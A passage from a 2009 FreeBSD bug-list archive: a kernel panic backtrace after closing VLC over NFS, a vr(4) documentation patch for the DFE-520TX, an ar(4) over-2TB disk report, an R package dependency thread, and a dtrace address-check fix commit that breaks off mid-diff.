(8.14.3/8.14.3/Submit) id n5O1aVRU041394; Wed, 24 Jun 2009 01:36:31 GMT (envelope-from nobody) Message-Id: <200906240136.n5O1aVRU041394@www.freebsd.org> Date: Wed, 24 Jun 2009 01:36:31 GMT From: Alexey Ivanov To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/135986: FreeBSD crashes after VLC close X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 01:40:02 -0000 >Number: 135986 >Category: misc >Synopsis: FreeBSD crashes after VLC close >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 24 01:40:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Alexey Ivanov >Release: FreeBSD-CURRENT >Organization: >Environment: FreeBSD PH34R 8.0-CURRENT FreeBSD 8.0-CURRENT #60 r194610: Mon Jun 22 07:00:08 MSD 2009 savetherbtz@PH34R:/usr/obj/usr/src/sys/PH34R.8 i386 >Description: If i close VLC while watching movie via NFS FreeBSD crashes Fatal trap 12: page fault while in kernel mode cpuid = 1; apic id = 01 fault virtual address = 0x4 fault code = supervisor read, page not present instruction pointer = 0x20:0xc0996b45 stack pointer = 0x28:0xea13c9b8 frame pointer = 0x28:0xea13c9d4 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 2110 (initial thread) trap number = 12 panic: page fault cpuid = 1 (kgdb) list *0xc0996b45 0xc0996b45 is in vaccess (/usr/src/sys/kern/vfs_subr.c:3535). 3530 *privused = 0; 3531 3532 dac_granted = 0; 3533 3534 /* Check the owner. */ 3535 if (cred->cr_uid == file_uid) { 3536 dac_granted |= VADMIN; 3537 if (file_mode & S_IXUSR) 3538 dac_granted |= VEXEC; 3539 if (file_mode & S_IRUSR) (kgdb) bt #0 doadump () at pcpu.h:246 #1 0xc090e857 in boot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:419 #2 0xc090eb4c in panic (fmt=Variable "fmt" is not available. ) at /usr/src/sys/kern/kern_shutdown.c:575 #3 0xc0c8c0bc in trap_fatal (frame=0xea13c978, eva=4) at /usr/src/sys/i386/i386/trap.c:933 #4 0xc0c8c3a0 in trap_pfault (frame=0xea13c978, usermode=0, eva=4) at /usr/src/sys/i386/i386/trap.c:846 #5 0xc0c8cf02 in trap (frame=0xea13c978) at /usr/src/sys/i386/i386/trap.c:528 #6 0xc0c70eab in calltrap () at /usr/src/sys/i386/i386/exception.s:165 #7 0xc0996b45 in vaccess (type=VREG, file_mode=33152, file_uid=1001, file_gid=1001, accmode=128, cred=0x0, privused=0x0) at /usr/src/sys/kern/vfs_subr.c:3535 #8 0xc0ba512e in ufs_access (ap=0xea13caec) at /usr/src/sys/ufs/ufs/ufs_vnops.c:402 #9 0xc0c997fc in VOP_ACCESS_APV (vop=0xc0e67c20, a=0xea13caec) at vnode_if.c:571 #10 0xc09a7b99 in vn_open_cred (ndp=0xea13cbd0, flagp=0xea13cc58, cmode=384, vn_open_flags=1, cred=0x0, fp=0x0) at vnode_if.h:254 #11 0xc09116ef in sigexit (td=0xc6ef9900, sig=11) at /usr/src/sys/kern/kern_sig.c:2943 #12 0xc091210e in postsig (sig=11) at /usr/src/sys/kern/kern_sig.c:2617 #13 0xc094bd58 in ast (framep=0xea13cd38) at /usr/src/sys/kern/subr_trap.c:225 #14 0xc0c71804 in doreti_ast () at /usr/src/sys/i386/i386/exception.s:365 >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 03:46:15 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 27C4D1065674; Wed, 24 Jun 2009 03:46:15 +0000 (UTC) (envelope-from pgollucci@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id F116C8FC18; Wed, 24 Jun 2009 03:46:14 +0000 (UTC) (envelope-from pgollucci@FreeBSD.org) Received: from freefall.freebsd.org (pgollucci@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O3kEN8050053; Wed, 24 Jun 2009 03:46:14 GMT (envelope-from pgollucci@freefall.freebsd.org) Received: (from pgollucci@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O3kEds050049; Wed, 24 Jun 2009 03:46:14 GMT (envelope-from pgollucci) Date: Wed, 24 Jun 2009 03:46:14 GMT Message-Id: <200906240346.n5O3kEds050049@freefall.freebsd.org> To: marcelk@bitpit.net, pgollucci@FreeBSD.org, freebsd-bugs@FreeBSD.org From: pgollucci@FreeBSD.org Cc: Subject: Re: kern/12792: Increase data size to 2GB X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 03:46:15 -0000 Synopsis: Increase data size to 2GB State-Changed-From-To: closed->feedback State-Changed-By: pgollucci State-Changed-When: Wed Jun 24 03:46:14 UTC 2009 State-Changed-Why: I spent some more time on this, http://tb.p6m7g8.net/errors/8-CURRENT-amd64/ifhp-3.5.22.log http://www.freebsd.org/cgi/query-pr.cgi?pr=12792 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 03:48:38 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4B8551065674; Wed, 24 Jun 2009 03:48:38 +0000 (UTC) (envelope-from pgollucci@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 20E598FC14; Wed, 24 Jun 2009 03:48:38 +0000 (UTC) (envelope-from pgollucci@FreeBSD.org) Received: from freefall.freebsd.org (pgollucci@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O3mcBC050253; Wed, 24 Jun 2009 03:48:38 GMT (envelope-from pgollucci@freefall.freebsd.org) Received: (from pgollucci@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O3mbip050249; Wed, 24 Jun 2009 03:48:37 GMT (envelope-from pgollucci) Date: Wed, 24 Jun 2009 03:48:37 GMT Message-Id: <200906240348.n5O3mbip050249@freefall.freebsd.org> To: marcelk@bitpit.net, pgollucci@FreeBSD.org, freebsd-bugs@FreeBSD.org From: pgollucci@FreeBSD.org Cc: Subject: Re: kern/12792: Increase data size to 2GB X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 03:48:38 -0000 Synopsis: Increase data size to 2GB State-Changed-From-To: feedback->closed State-Changed-By: pgollucci State-Changed-When: Wed Jun 24 03:48:33 UTC 2009 State-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=12792 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 04:30:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 5604B1065673 for ; Wed, 24 Jun 2009 04:30:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 30D1F8FC0C for ; Wed, 24 Jun 2009 04:30:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O4U24F080070 for ; Wed, 24 Jun 2009 04:30:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O4U2JS080062; Wed, 24 Jun 2009 04:30:02 GMT (envelope-from gnats) Resent-Date: Wed, 24 Jun 2009 04:30:02 GMT Resent-Message-Id: <200906240430.n5O4U2JS080062@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, "Rashid N. Achilov" Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 42B6E1065670 for ; Wed, 24 Jun 2009 04:21:10 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 25C318FC0C for ; Wed, 24 Jun 2009 04:21:10 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O4L9iX099650 for ; Wed, 24 Jun 2009 04:21:09 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5O4L952099649; Wed, 24 Jun 2009 04:21:09 GMT (envelope-from nobody) Message-Id: <200906240421.n5O4L952099649@www.freebsd.org> Date: Wed, 24 Jun 2009 04:21:09 GMT From: "Rashid N. Achilov" To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/135989: device vr support D-Link DFE-520TX, but none notified this X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 04:30:02 -0000 >Number: 135989 >Category: kern >Synopsis: device vr support D-Link DFE-520TX, but none notified this >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 24 04:30:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Rashid N. Achilov >Release: 7.2-RELEASE >Organization: LLC "AS-System Complex" >Environment: FreeBSD 7.2-RELEASE #0: Wed Jun 10 14:19:08 NOVST 2009 glance kernel: root@glance.askd.gmbh:/usr/obj/usr/src/sys/Glance >Description: I had NIC D-Link DFE-520TX, but I could not detect, which driver supports this. NOTES file does not mark anything about this NIC svr-63:[root] 251>cd /sys/conf && grep 520 * NOTES:hint.uart.0.baud="115200" svr-63:[root] 255>cd /sys/i386/conf && grep 520 * LINT:options CONSPEED=115200 NOTES:# CPU_ELAN enables support for AMDs ElanSC520 CPU. NOTES:options CONSPEED=115200 # Speed for serial console I have to reload server with GENERIC kernel and this way I have detect, that this NIC supported by vr driver Jun 24 10:38:14 glance kernel: vr0: port 0xd800-0xd8ff mem 0xff8ffc00-0xff8ffcff irq 22 at device 1.0 on pci1 Jun 24 10:38:14 glance kernel: vr0: Quirks: 0x0 Jun 24 10:38:14 glance kernel: vr0: Revision: 0x8b Jun 24 10:38:14 glance kernel: miibus0: on vr0 Jun 24 10:38:14 glance kernel: ukphy0: PHY 1 on miibus0 Jun 24 10:38:14 glance kernel: ukphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto Jun 24 10:38:14 glance kernel: vr0: Ethernet address: 00:1b:11:c3:8e:cc Jun 24 10:38:14 glance kernel: vr0: [ITHREAD] manual page about vr doesn't know anything about DFE-520TX (but claims about support DFE530-TX). So, only way to detect right driver for NIC is load server with GENERIC kernel, that's incorrect. I had done a coulpe simply patches, which included notification about supporting D-Link DFE-520TX NIC's >How-To-Repeat: Install D-Link DFE-520TX and try to guess, which driver support it without reloading GENERIC kernel or loading all available NIC drivers >Fix: Patches included Patch attached with submission follows: --- sys/conf/NOTES.old 2009-03-22 22:27:14.000000000 +0600 +++ sys/conf/NOTES 2009-06-24 11:11:13.000000000 +0700 @@ -1824,8 +1824,8 @@ # txp: Support for 3Com 3cR990 cards with the "Typhoon" chipset # vr: Support for various fast ethernet adapters based on the VIA # Technologies VT3043 `Rhine I' and VT86C100A `Rhine II' chips, -# including the D-Link DFE530TX (see 'rl' for DFE530TX+), the Hawking -# Technologies PN102TX, and the AOpen/Acer ALN-320. +# including the D-Link DFE520TX and D-Link DFE530TX (see 'rl' for DFE530TX+), +# the Hawking Technologies PN102TX, and the AOpen/Acer ALN-320. # vx: 3Com 3C590 and 3C595 # wb: Support for fast ethernet adapters based on the Winbond W89C840F chip. # Note: this is not the same as the Winbond W89C940F, which is a --- share/man/man4/vr.4.old 2008-04-11 10:49:47.000000000 +0700 +++ share/man/man4/vr.4 2009-06-24 11:16:35.000000000 +0700 @@ -130,6 +130,8 @@ .It AOpen/Acer ALN-320 .It +D-Link DFE520-TX +.It D-Link DFE530-TX .It Hawking Technologies PN102TX >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 05:39:45 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 7ED521065674; Wed, 24 Jun 2009 05:39:45 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 54CA18FC15; Wed, 24 Jun 2009 05:39:45 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O5djAn043596; Wed, 24 Jun 2009 05:39:45 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O5dje8043592; Wed, 24 Jun 2009 05:39:45 GMT (envelope-from remko) Date: Wed, 24 Jun 2009 05:39:45 GMT Message-Id: <200906240539.n5O5dje8043592@freefall.freebsd.org> To: dave@daveg.ca, remko@FreeBSD.org, freebsd-bugs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: kern/135976: kernel won't compile w/o options AH_SUPPORT_AR5416 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 05:39:45 -0000 Synopsis: kernel won't compile w/o options AH_SUPPORT_AR5416 State-Changed-From-To: open->closed State-Changed-By: remko State-Changed-When: Wed Jun 24 05:39:44 UTC 2009 State-Changed-Why: Hello, thanks for the report. THough this is a known dependency, if you do not want the options AH* thing you should compile without if_ah support... thanks for making FreeBSD better! http://www.freebsd.org/cgi/query-pr.cgi?pr=135976 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 08:00:11 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 2A1F8106567C for ; Wed, 24 Jun 2009 08:00:11 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id D71DF8FC15 for ; Wed, 24 Jun 2009 08:00:10 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O80AJK079727 for ; Wed, 24 Jun 2009 08:00:10 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O80AWF079726; Wed, 24 Jun 2009 08:00:10 GMT (envelope-from gnats) Resent-Date: Wed, 24 Jun 2009 08:00:10 GMT Resent-Message-Id: <200906240800.n5O80AWF079726@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, NAKAMURA Kazushi Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D2EB01065675 for ; Wed, 24 Jun 2009 07:59:23 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id A74C98FC18 for ; Wed, 24 Jun 2009 07:59:23 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O7xM72087044 for ; Wed, 24 Jun 2009 07:59:22 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5O7xMrA087042; Wed, 24 Jun 2009 07:59:22 GMT (envelope-from nobody) Message-Id: <200906240759.n5O7xMrA087042@www.freebsd.org> Date: Wed, 24 Jun 2009 07:59:22 GMT From: NAKAMURA Kazushi To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/135992: ar(4) driver can NOT drive over 2TB HDD X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 08:00:11 -0000 >Number: 135992 >Category: kern >Synopsis: ar(4) driver can NOT drive over 2TB HDD >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 24 08:00:10 UTC 2009 >Closed-Date: >Last-Modified: >Originator: NAKAMURA Kazushi >Release: FreeBSD7.2R/amd64 >Organization: Personal >Environment: Not installed >Description: 1: >From HP Proliant ML115G1, remove original 80GB HDD, replace 4x 1.5TB SATA HDD. Build on-board RAID0+1, it has recognized 1 ATA RAID drive, 2.72TB. But FreeBSD's ar(4) driver recognized only 0.7TB ar0. 2: Then, I have try GEOM framework with FixIt CD-ROM. But, not only "gpt" also "gpart" recognized only 0.7TB too. >How-To-Repeat: >Fix: ar(4) driver should be 64bit clean, to proper recognize over 2TB HDD. >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 10:06:14 2009 Return-Path: Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 13D75106566C; Wed, 24 Jun 2009 10:06:14 +0000 (UTC) (envelope-from dreibh@iem.uni-due.de) Received: from mailout.uni-due.de (mailout.uni-due.de [132.252.185.19]) by mx1.freebsd.org (Postfix) with ESMTP id 97DF28FC17; Wed, 24 Jun 2009 10:06:13 +0000 (UTC) (envelope-from dreibh@iem.uni-due.de) Received: from kappes.local ([132.252.151.151]) (authenticated bits=0) by mailout.uni-due.de (8.13.1/8.13.1) with ESMTP id n5O9h0fA032143 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT); Wed, 24 Jun 2009 11:43:01 +0200 From: Thomas Dreibholz Organization: University of Duisburg-Essen To: brian@freebsd.org Date: Wed, 24 Jun 2009 11:42:56 +0200 User-Agent: KMail/1.9.10 References: <200906231802.n5NI2r8w098924@freefall.freebsd.org> In-Reply-To: <200906231802.n5NI2r8w098924@freefall.freebsd.org> MIME-Version: 1.0 Content-Type: multipart/signed; boundary="nextPart1766378.MR9n8e453L"; protocol="application/pgp-signature"; micalg=pgp-sha1 Content-Transfer-Encoding: 7bit Message-Id: <200906241143.00826.dreibh@iem.uni-due.de> X-Spam-Scanned: SpamAssassin: 3.002004 - http://www.spamassassin.org X-Scanned-By: MIMEDefang 2.57 on 132.252.185.19 Cc: freebsd-bugs@freebsd.org Subject: Re: misc/135967: GNU R package: missing dependency for libgfortran.so.2 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 10:06:14 -0000 --nextPart1766378.MR9n8e453L Content-Type: text/plain; charset="iso-8859-15" Content-Transfer-Encoding: quoted-printable Content-Disposition: inline On Dienstag 23 Juni 2009, brian@freebsd.org wrote: > Synopsis: GNU R package: missing dependency for libgfortran.so.2 > > State-Changed-From-To: open->feedback > State-Changed-By: brian > State-Changed-When: Tue Jun 23 17:59:15 UTC 2009 > State-Changed-Why: > Hi, > > This has the same behaviour for me on FreeBSD-6.4 and FreeBSD-7.2. > libR depends on gcc-4.3.4 which installs libgfortran.so.3 in > /usr/local/lib/gcc43. > > Does it fix things if you `ldconfig -R /usr/local/lib/gcc43/`? > If it does, we can probably assign this PR to the gcc43 maintainers > and you can work around the problem by adding /usr/local/lib/gcc43 > to ldconfig_paths in /etc/rc.conf. After installing the package gcc42 (gcc-4.2.5_20080702) using "pkg_add -R=20 gcc42" on my FreeBSD 7.1 system, R starts without any further configuration= =2E=20 It seems that the R package only lacks of a dependency on gcc42 (or gcc43 o= n=20 newer systems?). Best regards =2D-=20 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Dr. Thomas Dreibholz University of Duisburg-Essen, Room ES210 Inst. for Experimental Mathematics Ellernstra=DFe 29 Computer Networking Technology Group D-45326 Essen/Germany =2D---------------------------------------------------------------------- E-Mail: dreibh@iem.uni-due.de Homepage: http://www.iem.uni-due.de/~dreibh =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --nextPart1766378.MR9n8e453L Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQBKQfUk32BbsHYPLWURAkS0AKDeIS0f44wSfDEQJsXvcjWt1EVRLgCgzQbn FvwL3zhx1lt2ujcsrNBoesg= =y/Px -----END PGP SIGNATURE----- --nextPart1766378.MR9n8e453L-- From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 11:41:14 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 147B31065673; Wed, 24 Jun 2009 11:41:14 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id A3A988FC36; Wed, 24 Jun 2009 11:41:13 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OBfDGv064961; Wed, 24 Jun 2009 11:41:13 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OBfDXl064957; Wed, 24 Jun 2009 11:41:13 GMT (envelope-from remko) Date: Wed, 24 Jun 2009 11:41:13 GMT Message-Id: <200906241141.n5OBfDXl064957@freefall.freebsd.org> To: remko@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports-bugs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: ports/135967: lang/gcc43 GNU R package: missing dependency for libgfortran.so.2 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 11:41:16 -0000 Old Synopsis: GNU R package: missing dependency for libgfortran.so.2 New Synopsis: lang/gcc43 GNU R package: missing dependency for libgfortran.so.2 Responsible-Changed-From-To: freebsd-bugs->freebsd-ports-bugs Responsible-Changed-By: remko Responsible-Changed-When: Wed Jun 24 11:40:37 UTC 2009 Responsible-Changed-Why: reassign to ports http://www.freebsd.org/cgi/query-pr.cgi?pr=135967 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 16:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B48C01065674 for ; Wed, 24 Jun 2009 16:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 974B48FC20 for ; Wed, 24 Jun 2009 16:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OGA3L9060558 for ; Wed, 24 Jun 2009 16:10:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OGA3Ou060557; Wed, 24 Jun 2009 16:10:03 GMT (envelope-from gnats) Date: Wed, 24 Jun 2009 16:10:03 GMT Message-Id: <200906241610.n5OGA3Ou060557@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: kern/134408: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 16:10:04 -0000 The following reply was made to PR kern/134408; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: kern/134408: commit references a PR Date: Wed, 24 Jun 2009 16:04:08 +0000 (UTC) Author: avg Date: Wed Jun 24 16:03:57 2009 New Revision: 194850 URL: http://svn.freebsd.org/changeset/base/194850 Log: dtrace/amd64: fix virtual address checks On amd64 KERNBASE/kernbase does not mean start of kernel memory. This should fix a KASSERT panic in dtrace_copycheck when copyin*() is used in D program. Also make checks for user memory a bit stricter. Reported by: Thomas Backman Submitted by: wxs (kaddr part) Tested by: Thomas Backman (prototype), wxs Reviewed by: alc (concept), jhb, current@ Aprroved by: jb (concept) MFC after: 2 weeks PR: kern/134408 Modified: head/sys/cddl/dev/dtrace/amd64/dtrace_isa.c head/sys/cddl/dev/dtrace/amd64/dtrace_subr.c Modified: head/sys/cddl/dev/dtrace/amd64/dtrace_isa.c ============================================================================== --- head/sys/cddl/dev/dtrace/amd64/dtrace_isa.c Wed Jun 24 15:48:20 2009 (r194849) +++ head/sys/cddl/dev/dtrace/amd64/dtrace_isa.c Wed Jun 24 16:03:57 2009 (r194850) @@ -42,8 +42,6 @@ #include #include -extern uintptr_t kernbase; -uintptr_t kernelbase = (uintptr_t) &kernbase; uint8_t dtrace_fuword8_nocheck(void *); uint16_t dtrace_fuword16_nocheck(void *); @@ -524,9 +522,9 @@ dtrace_getreg(struct regs *rp, uint_t re static int dtrace_copycheck(uintptr_t uaddr, uintptr_t kaddr, size_t size) { - ASSERT(kaddr >= kernelbase && kaddr + size >= kaddr); + ASSERT(INKERNEL(kaddr) && kaddr + size >= kaddr); - if (uaddr + size >= kernelbase || uaddr + size < uaddr) { + if (uaddr + size > VM_MAXUSER_ADDRESS || uaddr + size < uaddr) { DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR); cpu_core[curcpu].cpuc_dtrace_illval = uaddr; return (0); @@ -570,7 +568,7 @@ dtrace_copyoutstr(uintptr_t kaddr, uintp uint8_t dtrace_fuword8(void *uaddr) { - if ((uintptr_t)uaddr >= kernelbase) { + if ((uintptr_t)uaddr > VM_MAXUSER_ADDRESS) { DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR); cpu_core[curcpu].cpuc_dtrace_illval = (uintptr_t)uaddr; return (0); @@ -581,7 